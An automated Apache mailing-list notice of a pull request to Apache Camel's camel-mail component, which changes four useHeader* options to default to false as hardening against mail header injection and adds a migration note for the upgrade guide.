rpamu-jdev opened a new pull request, #24002: URL: https://github.com/apache/camel/pull/24002
Changes the `useHeaderRecipients`, `useHeaderFrom`, `useHeaderReplyTo`, and `useHeaderSubject` options in `camel-mail` from `defaultValue=true` to `defaultValue=false`. This is a security hardening change (similar to CAMEL-23522 / CVE-2025-27636). When default=true, untrusted exchange headers could silently override the recipients, sender, subject, or reply-to configured in the endpoint URI — a potential header injection vector. With default=false, the endpoint URI configuration is always used unless the user explicitly opts in by setting the option to true in the URI. **Changes:** - `MailConfiguration.java`: set all 4 `useHeader*` options to `defaultValue = "false"` and label `producer,security` - Updated affected tests to explicitly opt-in with `useHeader*=true` in the URI - Added breaking change notice and migration guide to `camel-4x-upgrade-guide-4_21.adoc` **Migration:** Users who rely on exchange headers overriding mail recipients/sender/subject/reply-to must explicitly add `useHeaderRecipients=true`, `useHeaderFrom=true`, `useHeaderSubject=true`, or `useHeaderReplyTo=true` to their endpoint URI. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
